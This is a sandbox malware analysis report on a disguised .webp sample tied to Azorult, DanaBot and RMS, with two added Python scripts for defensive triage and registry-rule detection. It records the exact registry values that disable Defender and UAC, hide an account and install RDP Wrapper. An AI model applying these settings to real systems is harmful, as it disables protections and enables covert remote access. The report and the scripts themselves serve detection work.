Malware Analysis Report

2025-05-28 17:09

Sample ID 250519-meq5taem8v
Target 20250322_162339.webp
SHA256 a48de509cda096a6b13c6f51d7312ecdb42418610ef1e86631e638ce90ec7cda
Tags
azorult danabot rms banker botnet defense_evasion discovery execution infostealer lateral_movement persistence privilege_escalation rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a48de509cda096a6b13c6f51d7312ecdb42418610ef1e86631e638ce90ec7cda

Threat Level: Known bad

The file 20250322_162339.webp was found to be: Known bad.

Malicious Activity Summary

azorult danabot rms banker botnet defense_evasion discovery execution infostealer lateral_movement persistence privilege_escalation rat trojan upx

UAC bypass

Windows security bypass

Azorult family

Danabot

Azorult

Modifies visibility of hidden/system files in Explorer

Danabot family

RMS

Modifies Windows Defender Real-time Protection settings

Danabot x86 payload

Rms family

Remote Service Session Hijacking: RDP Hijacking

Grants admin privileges

Downloads MZ/PE file

Sets file to hidden

Drops file in Drivers directory

Server Software Component: Terminal Services DLL

Modifies Windows Firewall

Blocklisted process makes network request

Stops running service(s)

Blocks application from running via registry modification

Modifies file permissions

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Password Policy Discovery

Command and Scripting Interpreter: PowerShell

Adds Run key to start application

Modifies WinLogon

Looks up external IP address via web service

UPX packed file

Drops file in System32 directory

AutoIT Executable

Hide Artifacts: Hidden Users

Launches sc.exe

Drops file in Program Files directory

Permission Groups Discovery: Local Groups

Program crash

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Browser Information Discovery

System Location Discovery: System Language Discovery

Suspicious behavior: LoadsDriver

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Gathers network information

Delays execution with timeout.exe

Kills process with taskkill

Suspicious behavior: SetClipboardViewer

NTFS ADS

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Runs .reg file with regedit

Opens file in notepad (likely ransom note)

System policy modification

Checks processor information in registry

Runs net.exe

Modifies registry class

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Reported

2025-05-19 10:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-19 10:22

Reported

2025-05-19 10:30

Platform

win10v2004-20250502-en

Max time kernel

413s

Max time network

409s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\20250322_162339.webp

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Danabot

trojan banker danabot

Danabot family

danabot

Danabot x86 payload

botnet
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |

Modifies visibility of hidden/system files in Explorer

defense_evasion
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |

RMS

trojan rat rms

Rms family

rms

UAC bypass

defense_evasion trojan
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |

Windows security bypass

defense_evasion trojan
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\regedit.exe | N/A |

Grants admin privileges

Remote Service Session Hijacking: RDP Hijacking

lateral_movement
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |

Blocks application from running via registry modification

defense_evasion
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |

Drops file in Drivers directory

| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\Downloads\Azorult.exe | N/A |

Server Software Component: Terminal Services DLL

persistence
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\rdp\RDPWInst.exe | N/A |

Sets file to hidden

defense_evasion
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A | 3 |

Stops running service(s)

defense_evasion execution

Checks computer location settings

| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winlog.exe | N/A | 1 |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winlogon.exe | N/A | 1 |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A | 1 |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A | 3 |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\programdata\install\cheat.exe | N/A | 1 |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\R8.exe | N/A | 1 |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A | 1 |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Azorult.exe | N/A | 1 |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\wini.exe | N/A | 1 |

Executes dropped EXE

Description, Indicator and Target are N/A for every row; identical rows are merged and counted (38 executions in total, path spellings kept as reported).

| Process | Count |
|---|---|
| C:\Users\Admin\Downloads\DanaBot.exe | 4 |
| C:\Users\Admin\Downloads\SpySheriff.exe | 2 |
| C:\Users\Admin\Downloads\Azorult.exe | 2 |
| C:\ProgramData\Microsoft\Intel\wini.exe | 1 |
| C:\ProgramData\Windows\winit.exe | 1 |
| C:\ProgramData\Windows\rutserv.exe | 4 |
| C:\programdata\install\cheat.exe | 1 |
| C:\programdata\install\ink.exe | 1 |
| C:\ProgramData\Windows\rfusclient.exe | 3 |
| C:\ProgramData\Microsoft\Intel\taskhost.exe | 1 |
| C:\programdata\microsoft\intel\P.exe | 1 |
| C:\Users\Admin\Downloads\Mabezat.exe | 4 |
| C:\programdata\microsoft\intel\R8.exe | 1 |
| C:\ProgramData\Microsoft\Intel\winlog.exe | 1 |
| C:\ProgramData\Microsoft\Intel\winlogon.exe | 1 |
| C:\rdp\Rar.exe | 1 |
| C:\Programdata\RealtekHD\taskhostw.exe | 5 |
| C:\ProgramData\RealtekHD\taskhostw.exe | 1 |
| C:\rdp\RDPWInst.exe | 2 |
| C:\Programdata\WindowsTask\winlogon.exe | 1 |
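Several of the dropped executables above borrow the names of Windows system binaries (winlogon.exe, taskhost.exe, taskhostw.exe) while running from ProgramData, and others are components of legitimate remote-access tooling: rutserv.exe and rfusclient.exe are the Remote Utilities (RMS) service and client, and RDPWInst.exe is the RDP Wrapper installer that the report shows writing rdpwrap.dll. The following Python script is an added example, not part of the sandbox report: it takes the process paths from the table, merges case variants (NTFS paths are case-insensitive), and flags name/location masquerading, known remote-access components and staging from user-writable directories. The reference lists of system-binary names and directory roots are assumptions chosen for illustration.

```python
"""Triage dropped-executable paths from a sandbox report: masquerading and staging checks."""
import ntpath
from collections import Counter
from typing import Dict, List

# Constructed sample input: process paths taken from the "Executes dropped EXE" table.
SAMPLE_PROCESSES = [
    r'C:\Users\Admin\Downloads\DanaBot.exe',
    r'C:\Users\Admin\Downloads\Azorult.exe',
    r'C:\ProgramData\Microsoft\Intel\winlogon.exe',
    r'C:\ProgramData\Microsoft\Intel\taskhost.exe',
    r'C:\Programdata\RealtekHD\taskhostw.exe',
    r'C:\ProgramData\RealtekHD\taskhostw.exe',
    r'C:\Programdata\WindowsTask\winlogon.exe',
    r'C:\ProgramData\Windows\rutserv.exe',
    r'C:\ProgramData\Windows\rfusclient.exe',
    r'C:\rdp\RDPWInst.exe',
    r'C:\Windows\SysWOW64\attrib.exe',
    r'C:\Windows\System32\winlogon.exe',
]

# Assumed reference lists for illustration, not sandbox data: binary names that only
# belong in the Windows system directories, and remote-access components named in the report.
SYSTEM_BINARY_NAMES = {'winlogon.exe', 'taskhost.exe', 'taskhostw.exe', 'svchost.exe',
                       'csrss.exe', 'lsass.exe', 'explorer.exe', 'dwm.exe'}
SYSTEM_DIRS = ('c:\\windows\\system32', 'c:\\windows\\syswow64')
REMOTE_ACCESS_COMPONENTS = {
    'rutserv.exe': 'Remote Utilities (RMS) service',
    'rfusclient.exe': 'Remote Utilities (RMS) client',
    'rdpwinst.exe': 'RDP Wrapper installer',
}


def location_reason(directory: str):
    """Why the directory is a suspicious home for an executable, or None if it is not."""
    if directory.startswith('c:\\programdata'):
        return 'runs from ProgramData (user-writable staging directory)'
    if directory.startswith('c:\\users\\'):
        return 'runs from a user profile directory'
    if directory.startswith(('c:\\windows', 'c:\\program files')):
        return None
    return 'runs from a non-standard top-level directory'


def classify(path: str) -> List[str]:
    """Return the reasons a single executable path looks suspicious (case-folded)."""
    directory, name = ntpath.split(path.casefold())
    reasons = []
    if name in SYSTEM_BINARY_NAMES and not directory.startswith(SYSTEM_DIRS):
        reasons.append(f'{name} is a Windows system binary name running outside '
                       'System32/SysWOW64 (T1036.005 Match Legitimate Name or Location)')
    if name in REMOTE_ACCESS_COMPONENTS:
        reasons.append(f'{REMOTE_ACCESS_COMPONENTS[name]} (T1219 Remote Access Software)')
    location = location_reason(directory)
    if location:
        reasons.append(location)
    return reasons


def triage(paths) -> Dict[str, dict]:
    """Merge case variants of each path, count executions, and attach reasons per unique path."""
    counts = Counter(p.casefold() for p in paths)
    return {p: {'count': n, 'reasons': classify(p)} for p, n in counts.items()}


def flagged(paths) -> List[str]:
    """Unique paths with at least one reason, most-executed first."""
    report = triage(paths)
    hits = [p for p, info in report.items() if info['reasons']]
    return sorted(hits, key=lambda p: (-report[p]['count'], p))


if __name__ == '__main__':
    report = triage(SAMPLE_PROCESSES)
    for path in flagged(SAMPLE_PROCESSES):
        print(f"{path} (x{report[path]['count']})")
        for reason in report[path]['reasons']:
            print(f'    - {reason}')
```

On the sample input, the two spellings of the RealtekHD taskhostw.exe path collapse into one entry, the genuine System32\winlogon.exe and SysWOW64\attrib.exe produce no findings, and nine of the eleven unique paths are flagged.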

Modifies file permissions

discovery
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A | 62 |

Adds Run key to start application

persistence
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |

Checks whether UAC is enabled

defense_evasion trojan
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |

Command and Scripting Interpreter: PowerShell

execution
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Legitimate hosting services abused for malware hosting/C2

| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | raw.githubusercontent.com | N/A | N/A | 8 |
| N/A | iplogger.org | N/A | N/A | 2 |

Looks up external IP address via web service

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | ip-api.com | N/A | N/A |

Modifies WinLogon

persistence
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |

Password Policy Discovery

discovery

AutoIT Executable

4 matches; the report gives no per-match details (Description, Indicator, Process and Target are all N/A).

Drops file in System32 directory

| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\rfxvmt.dll | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Hide Artifacts: Hidden Users

defense_evasion
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
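The registry indicators in the Windows Defender, UAC bypass, Windows security bypass, DisallowRun, Terminal Services DLL, Run key, WinLogon and Hidden Users sections share one shape: a policy value set to a known-bad constant, or a sensitive key created, by a process that is itself a dropped binary. The following Python script is an added example, not part of the sandbox report or its detection engine: it parses rows in the report's whitespace-delimited `Set value` / `Key created` format, normalises the key (HKLM/HKU short hives, SID and WOW6432Node stripped so one rule covers both registry views and any user), and evaluates each row against a small rule set labelled with the ATT&CK technique IDs the report itself uses. The sample rows are constructed from indicators on this page; the rule names, patterns and expected values are illustrative assumptions.

```python
"""Evaluate registry indicator rows from the report against a small tamper rule set."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample rows, in the whitespace-delimited shape of the report's
# "Description Indicator Process Target" lines (copied from the sections above).
SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\Downloads\Azorult.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\regedit.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" C:\Users\Admin\Downloads\Azorult.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\Downloads\Azorult.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" C:\rdp\RDPWInst.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\Programdata\RealtekHD\taskhostw.exe N/A',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\regedit.exe N/A',
    r'Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A',
]

# One row: <operation> <key>[ = "<value>"] <process> <target>. The key may contain spaces,
# so it is matched lazily and the two trailing process/target tokens anchor the end.
ROW_RE = re.compile(
    r'^(?P<op>Set value \((?P<type>\w+)\)|Key created|Key opened|Key queried'
    r'|Key value queried|Key value enumerated) '
    r'(?P<key>\\REGISTRY\\.+?)'
    r'(?: = "(?P<value>.*)")?'
    r' (?P<process>\S+) (?P<target>\S+)$'
)
HIVE_RE = re.compile(r'^\\REGISTRY\\(MACHINE|USER\\S-1-5-[\d-]+)\\', re.IGNORECASE)


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str                        # ATT&CK technique ID, as used by the report
    key_pattern: str                      # regex over the normalised key
    expected_value: Optional[str] = None  # None: any value, or a key-only event


# Illustrative rule set (an assumption, not the sandbox's own signature logic).
RULES = [
    Rule('Defender real-time protection disabled by policy', 'T1562.001',
         r'^HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\Disable\w+$', '1'),
    Rule('Defender exclusion key created', 'T1562.001',
         r'^HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\'),
    Rule('UAC prompting or enforcement disabled', 'T1548.002',
         r'^HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\'
         r'(EnableLUA|ConsentPromptBehaviorAdmin|PromptOnSecureDesktop)$', '0'),
    Rule('Explorer DisallowRun entry added', 'T1562.001',
         r'^HKU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\\\d+$'),
    Rule('Account hidden from the logon screen', 'T1564.002',
         r'^HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\[^\\]+$', '0'),
    Rule('TermService ServiceDll replaced', 'T1505.005',
         r'^HKLM\\SYSTEM\\ControlSet\d+\\Services\\TermService\\Parameters\\ServiceDll$'),
    Rule('Run key persistence', 'T1547.001',
         r'^HK(LM|U)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\'),
]


@dataclass
class Finding:
    rule: str
    technique: str
    key: str
    value: Optional[str]
    process: str


def parse_row(line: str) -> Optional[dict]:
    """Parse one report row. Rows whose process path contains spaces are ambiguous in this
    whitespace-delimited format and come back as None rather than being mis-split."""
    m = ROW_RE.match(line.strip())
    return m.groupdict() if m else None


def normalize_key(key: str) -> str:
    """\\REGISTRY\\MACHINE -> HKLM, \\REGISTRY\\USER\\<SID> -> HKU, WOW6432Node dropped."""
    m = HIVE_RE.match(key)
    if m:
        hive = 'HKLM' if m.group(1).upper() == 'MACHINE' else 'HKU'
        key = hive + '\\' + key[m.end():]
    return key.replace('\\WOW6432Node\\', '\\')


def evaluate(rows) -> List[Finding]:
    """Match every parsable row against every rule; a rule with an expected value only
    fires when the written value equals it (so EnableLUA = "1" would not fire)."""
    findings = []
    for line in rows:
        row = parse_row(line)
        if row is None:
            continue
        key = normalize_key(row['key'])
        for rule in RULES:
            if re.search(rule.key_pattern, key, re.IGNORECASE) and \
                    (rule.expected_value is None or row['value'] == rule.expected_value):
                findings.append(Finding(rule.name, rule.technique, key, row['value'], row['process']))
    return findings


def techniques(rows) -> List[str]:
    """Sorted, de-duplicated ATT&CK technique IDs observed in the rows."""
    return sorted({f.technique for f in evaluate(rows)})


if __name__ == '__main__':
    for f in evaluate(SAMPLE_ROWS):
        print(f'{f.technique} {f.rule}: {f.key} = {f.value!r} by {f.process}')
```

On the sample rows the Geo\Nation lookup matches no rule and the other seven rows each produce one finding across five techniques; feeding the script the full tables above (one row per line) is the intended use, and a row whose process path contains spaces is skipped rather than guessed.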

UPX packed file

upx
6 matches; the report gives no per-match details (Description, Indicator, Process and Target are all N/A).

Drops file in Program Files directory

Rows are grouped by process: Azorult.exe opens the install directories of security products (a presence check) and drops iediagcmd.exe under Common Files; RDPWInst.exe and attrib.exe install and hide RDP Wrapper; the msedge.exe rows are the browser's own component extraction (chrome_Unpacker_*), not sample activity.

| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Program Files\COMODO | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVAST Software | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\McAfee | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\AVAST Software | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Cezurity | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Cezurity | C:\Users\Admin\Downloads\Azorult.exe | N/A |
